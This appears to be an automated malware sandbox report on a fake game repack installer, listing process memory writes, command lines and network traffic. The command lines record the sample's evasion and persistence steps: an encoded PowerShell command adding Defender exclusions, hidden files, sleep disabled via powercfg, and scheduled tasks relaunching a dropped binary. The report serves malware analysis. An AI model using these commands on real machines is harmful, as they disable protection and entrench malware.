PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 752 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4340 wrote to memory of 2024 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4060 wrote to memory of 356 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4060 wrote to memory of 356 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4060 wrote to memory of 2204 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 4060 wrote to memory of 2204 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 4060 wrote to memory of 2204 N/A C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 2204 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 2204 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 3728 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3728 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3728 wrote to memory of 8 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\LaunchWinApp.exe

"C:\Windows\system32\LaunchWinApp.exe" "https://feel-easy.games/catalog/counter-strike-go/"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\8e2e508d1cdf4962b651ae1c84f59cf3 /t 0 /p 1396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack\" -ad -an -ai#7zMap2531:228:7zEvent11327

C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe

"C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\read me.txt

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p1432210452150682449214609890 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_8.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADMATAAxAEMAaAB4ADUATAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUATwA4AFIAdwBXAEwARQAyAEMAUgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBqAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQA1ADAAIwA+AA=="

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\powercfg.exe

powercfg /hibernate off

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4901" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 feel-easy.games udp
RU 185.105.110.5:443 feel-easy.games tcp
RU 185.105.110.5:443 feel-easy.games tcp
US 8.8.8.8:53 5.110.105.185.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 162.25.221.88.in-addr.arpa udp
RU 185.105.110.5:443 feel-easy.games tcp
RU 185.105.110.5:443 feel-easy.games tcp
US 8.8.8.8:53 www.mediafire.com udp
US 104.16.53.48:443 www.mediafire.com tcp
US 104.16.53.48:443 www.mediafire.com tcp
US 8.8.8.8:53 the.gatekeeperconsent.com udp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 www.ezojs.com udp
US 8.8.8.8:53 translate.google.com udp
US 172.67.144.62:443 the.gatekeeperconsent.com tcp
US 172.67.144.62:443 the.gatekeeperconsent.com tcp
NL 142.250.179.206:443 translate.google.com tcp
NL 142.250.179.206:443 translate.google.com tcp
US 172.67.201.96:443 www.ezojs.com tcp
US 172.67.201.96:443 www.ezojs.com tcp
US 172.67.70.134:443 btloader.com tcp
US 172.67.70.134:443 btloader.com tcp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
US 8.8.8.8:53 48.53.16.104.in-addr.arpa udp
US 8.8.8.8:53 101.14.18.104.in-addr.arpa udp
US 8.8.8.8:53 200.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 96.201.67.172.in-addr.arpa udp
US 8.8.8.8:53 62.144.67.172.in-addr.arpa udp
US 8.8.8.8:53 134.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 101.56.16.104.in-addr.arpa udp
US 8.8.8.8:53 privacy.gatekeeperconsent.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 172.67.144.62:443 privacy.gatekeeperconsent.com tcp
US 172.67.144.62:443 privacy.gatekeeperconsent.com tcp
NL 108.156.61.101:443 cdn.amplitude.com tcp
NL 108.156.61.101:443 cdn.amplitude.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 104.16.53.48:443 www.mediafire.com tcp
US 104.16.53.48:443 www.mediafire.com tcp
US 8.8.8.8:53 static.mediafire.com udp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 101.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 115.61.156.108.in-addr.arpa udp
US 8.8.8.8:53 48.54.16.104.in-addr.arpa udp
US 8.8.8.8:53 230.137.222.52.in-addr.arpa udp
RU 185.105.110.5:443 feel-easy.games tcp
RU 185.105.110.5:443 feel-easy.games tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 104.16.53.48:443 static.mediafire.com tcp
US 172.67.70.134:443 btloader.com tcp
US 172.67.70.134:443 btloader.com tcp
NL 142.250.179.206:443 translate.google.com tcp
NL 142.250.179.206:443 translate.google.com tcp
NL 108.156.61.101:443 cdn.amplitude.com tcp
NL 108.156.61.101:443 cdn.amplitude.com tcp
US 8.8.8.8:53 translate.googleapis.com udp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
US 104.16.54.48:443 static.mediafire.com tcp
NL 142.251.39.106:443 translate.googleapis.com tcp
NL 142.251.39.106:443 translate.googleapis.com tcp
US 8.8.8.8:53 privacy.ezodn.com udp
US 172.64.170.5:443 privacy.ezodn.com tcp
US 172.64.170.5:443 privacy.ezodn.com tcp
US 8.8.8.8:53 133.137.222.52.in-addr.arpa udp
US 8.8.8.8:53 x2.c.lencr.org udp
NL 23.222.33.142:80 x2.c.lencr.org tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 5.170.64.172.in-addr.arpa udp
US 8.8.8.8:53 api.amplitude.com udp
US 54.245.0.38:443 api.amplitude.com tcp
US 54.245.0.38:443 api.amplitude.com tcp
US 8.8.8.8:53 g.ezoic.net udp
US 3.210.81.252:443 g.ezoic.net tcp
US 3.210.81.252:443 g.ezoic.net tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 38.0.245.54.in-addr.arpa udp
US 8.8.8.8:53 go.ezodn.com udp
US 172.64.170.5:443 go.ezodn.com tcp
US 172.64.170.5:443 go.ezodn.com tcp
US 172.64.170.5:443 go.ezodn.com tcp
US 172.64.170.5:443 go.ezodn.com tcp
US 172.64.170.5:443 go.ezodn.com tcp
US 8.8.8.8:53 101.15.18.104.in-addr.arpa udp
US 8.8.8.8:53 252.81.210.3.in-addr.arpa udp
US 8.8.8.8:53 200.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 216.239.38.181:443 analytics.google.com tcp
US 216.239.38.181:443 analytics.google.com tcp
NL 142.250.102.155:443 stats.g.doubleclick.net tcp
NL 142.250.102.155:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 download1514.mediafire.com udp
US 205.196.123.202:443 download1514.mediafire.com tcp
US 205.196.123.202:443 download1514.mediafire.com tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
US 34.235.214.237:443 btlr.sharethrough.com tcp
DE 172.217.23.194:443 securepubads.g.doubleclick.net tcp
DE 172.217.23.194:443 securepubads.g.doubleclick.net tcp
US 34.107.148.139:443 prebid.media.net tcp
US 34.107.148.139:443 prebid.media.net tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 181.38.239.216.in-addr.arpa udp
US 8.8.8.8:53 155.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.123.196.205.in-addr.arpa udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 139.148.107.34.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 77.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 237.214.235.34.in-addr.arpa udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
NL 142.250.179.206:443 fundingchoicesmessages.google.com tcp
NL 142.250.179.206:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 8.8.8.8:53 cdn.id5-sync.com udp
US 8.8.8.8:53 oa.openxcdn.net udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 cdn.prod.uidapi.com udp
US 8.8.8.8:53 tags.crwdcntrl.net udp
US 8.8.8.8:53 invstatic101.creativecdn.com udp
US 34.102.146.192:443 oa.openxcdn.net tcp
US 34.102.146.192:443 oa.openxcdn.net tcp
DE 65.9.66.122:443 tags.crwdcntrl.net tcp
DE 65.9.66.122:443 tags.crwdcntrl.net tcp
US 34.96.70.87:443 invstatic101.creativecdn.com tcp
US 34.96.70.87:443 invstatic101.creativecdn.com tcp
NL 52.222.141.36:443 cdn.prod.uidapi.com tcp
NL 52.222.141.36:443 cdn.prod.uidapi.com tcp
FR 178.250.7.2:443 static.criteo.net tcp
FR 178.250.7.2:443 static.criteo.net tcp
US 151.101.1.229:443 cdn.jsdelivr.net tcp
US 151.101.1.229:443 cdn.jsdelivr.net tcp
US 172.67.38.106:443 cdn.id5-sync.com tcp
US 172.67.38.106:443 cdn.id5-sync.com tcp
US 8.8.8.8:53 192.146.102.34.in-addr.arpa udp
US 8.8.8.8:53 d0e8d4c226d6d925a8ec056d7828fa38.safeframe.googlesyndication.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
NL 142.250.179.161:443 d0e8d4c226d6d925a8ec056d7828fa38.safeframe.googlesyndication.com tcp
NL 142.250.179.161:443 d0e8d4c226d6d925a8ec056d7828fa38.safeframe.googlesyndication.com tcp
NL 142.251.36.1:443 lh3.googleusercontent.com tcp
NL 142.251.36.1:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
DE 162.19.138.120:443 id5-sync.com tcp
DE 162.19.138.120:443 id5-sync.com tcp
US 34.206.201.46:443 bcp.crwdcntrl.net tcp
US 34.206.201.46:443 bcp.crwdcntrl.net tcp
US 8.8.8.8:53 oajs.openx.net udp
US 34.120.135.53:443 oajs.openx.net tcp
US 34.120.135.53:443 oajs.openx.net tcp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
NL 54.192.87.164:80 ocsp.r2m01.amazontrust.com tcp
US 8.8.8.8:53 esp.rtbhouse.com udp
US 35.190.39.111:443 esp.rtbhouse.com tcp
US 35.190.39.111:443 esp.rtbhouse.com tcp
US 8.8.8.8:53 87.70.96.34.in-addr.arpa udp
US 8.8.8.8:53 36.141.222.52.in-addr.arpa udp
US 8.8.8.8:53 229.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 106.38.67.172.in-addr.arpa udp
US 8.8.8.8:53 122.66.9.65.in-addr.arpa udp
US 8.8.8.8:53 2.7.250.178.in-addr.arpa udp
US 8.8.8.8:53 161.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 120.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 46.201.206.34.in-addr.arpa udp
US 8.8.8.8:53 53.135.120.34.in-addr.arpa udp
US 8.8.8.8:53 164.87.192.54.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
NL 142.250.179.130:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 8.8.8.8:53 dsum-sec.casalemedia.com udp
US 8.8.8.8:53 ib.adnxs.com udp
CA 185.80.39.216:443 dsum-sec.casalemedia.com tcp
CA 185.80.39.216:443 dsum-sec.casalemedia.com tcp
DE 37.252.171.52:443 ib.adnxs.com tcp
DE 37.252.171.52:443 ib.adnxs.com tcp
US 8.8.8.8:53 111.39.190.35.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 130.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 52.171.252.37.in-addr.arpa udp
US 8.8.8.8:53 216.39.80.185.in-addr.arpa udp
US 8.8.8.8:53 cdn.ampproject.org udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
NL 142.250.179.161:443 cdn.ampproject.org tcp
NL 142.250.179.161:443 cdn.ampproject.org tcp
NL 142.250.179.161:443 cdn.ampproject.org tcp
NL 142.250.179.161:443 cdn.ampproject.org tcp
NL 142.250.179.161:443 cdn.ampproject.org tcp
NL 142.251.36.1:443 tpc.googlesyndication.com tcp
NL 142.251.36.1:443 tpc.googlesyndication.com tcp
NL 142.251.36.1:443 tpc.googlesyndication.com tcp
US 8.8.8.8:53 google-bidout-d.openx.net udp
US 8.8.8.8:53 s0.2mdn.net udp
US 35.244.159.8:443 google-bidout-d.openx.net tcp
US 35.244.159.8:443 google-bidout-d.openx.net tcp
NL 142.250.179.134:443 s0.2mdn.net tcp
NL 142.250.179.134:443 s0.2mdn.net tcp
CA 185.80.39.216:443 dsum-sec.casalemedia.com tcp
CA 185.80.39.216:443 dsum-sec.casalemedia.com tcp
CA 185.80.39.216:443 dsum-sec.casalemedia.com tcp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 8.159.244.35.in-addr.arpa udp
US 8.8.8.8:53 134.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 c1.adform.net udp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
US 8.8.8.8:53 match.adsrvr.org udp
DK 37.157.3.20:443 c1.adform.net tcp
DK 37.157.3.20:443 c1.adform.net tcp
IE 67.220.228.200:443 aax-eu.amazon-adsystem.com tcp
IE 67.220.228.200:443 aax-eu.amazon-adsystem.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 8.8.8.8:53 googleads4.g.doubleclick.net udp
US 8.8.8.8:53 www.googletagservices.com udp
NL 172.217.168.226:443 www.googletagservices.com tcp
NL 172.217.168.226:443 www.googletagservices.com tcp
US 8.8.8.8:53 eu-u.openx.net udp
US 34.98.64.218:443 eu-u.openx.net tcp
US 34.98.64.218:443 eu-u.openx.net tcp
US 8.8.8.8:53 20.3.157.37.in-addr.arpa udp
US 8.8.8.8:53 198.40.223.52.in-addr.arpa udp
US 8.8.8.8:53 200.228.220.67.in-addr.arpa udp
US 8.8.8.8:53 226.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 ads.pubmatic.com udp
NL 104.85.0.200:443 ads.pubmatic.com tcp
NL 104.85.0.200:443 ads.pubmatic.com tcp
US 8.8.8.8:53 contextual.media.net udp
NL 104.85.0.23:443 contextual.media.net tcp
NL 104.85.0.23:443 contextual.media.net tcp
US 8.8.8.8:53 image6.pubmatic.com udp
NL 198.47.127.19:443 image6.pubmatic.com tcp
NL 198.47.127.19:443 image6.pubmatic.com tcp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 cr.frontend.weborama.fr udp
US 8.8.8.8:53 a.audrte.com udp
US 8.8.8.8:53 um.simpli.fi udp
US 8.8.8.8:53 d5p.de17a.com udp
US 52.20.221.75:443 sync.crwdcntrl.net tcp
US 52.20.221.75:443 sync.crwdcntrl.net tcp
US 34.111.129.221:443 cr.frontend.weborama.fr tcp
US 34.111.129.221:443 cr.frontend.weborama.fr tcp
US 34.206.0.129:443 a.audrte.com tcp
US 34.206.0.129:443 a.audrte.com tcp
NL 35.204.74.118:443 um.simpli.fi tcp
NL 35.204.74.118:443 um.simpli.fi tcp
SE 213.155.156.185:443 d5p.de17a.com tcp
SE 213.155.156.185:443 d5p.de17a.com tcp
US 8.8.8.8:53 p.rfihub.com udp
US 8.8.8.8:53 image2.pubmatic.com udp
US 104.36.113.107:443 image2.pubmatic.com tcp
US 104.36.113.107:443 image2.pubmatic.com tcp
NL 193.0.160.130:443 p.rfihub.com tcp
NL 193.0.160.130:443 p.rfihub.com tcp
US 8.8.8.8:53 dis.criteo.com udp
US 8.8.8.8:53 simage2.pubmatic.com udp
NL 178.250.1.9:443 dis.criteo.com tcp
NL 178.250.1.9:443 dis.criteo.com tcp
NL 198.47.127.205:443 simage2.pubmatic.com tcp
NL 198.47.127.205:443 simage2.pubmatic.com tcp
US 8.8.8.8:53 cms.quantserve.com udp
US 192.184.69.252:443 cms.quantserve.com tcp
US 192.184.69.252:443 cms.quantserve.com tcp
US 8.8.8.8:53 218.64.98.34.in-addr.arpa udp
US 8.8.8.8:53 200.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 23.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 19.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 221.129.111.34.in-addr.arpa udp
US 8.8.8.8:53 118.74.204.35.in-addr.arpa udp
US 8.8.8.8:53 185.156.155.213.in-addr.arpa udp
US 8.8.8.8:53 130.160.0.193.in-addr.arpa udp
US 8.8.8.8:53 75.221.20.52.in-addr.arpa udp
US 8.8.8.8:53 129.0.206.34.in-addr.arpa udp
US 8.8.8.8:53 9.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 205.127.47.198.in-addr.arpa udp
US 8.8.8.8:53 107.113.36.104.in-addr.arpa udp
US 8.8.8.8:53 widget.us.criteo.com udp
US 74.119.119.150:443 widget.us.criteo.com tcp
US 74.119.119.150:443 widget.us.criteo.com tcp
DK 37.157.5.132:443 dmp.adform.net tcp
DK 37.157.5.132:443 dmp.adform.net tcp
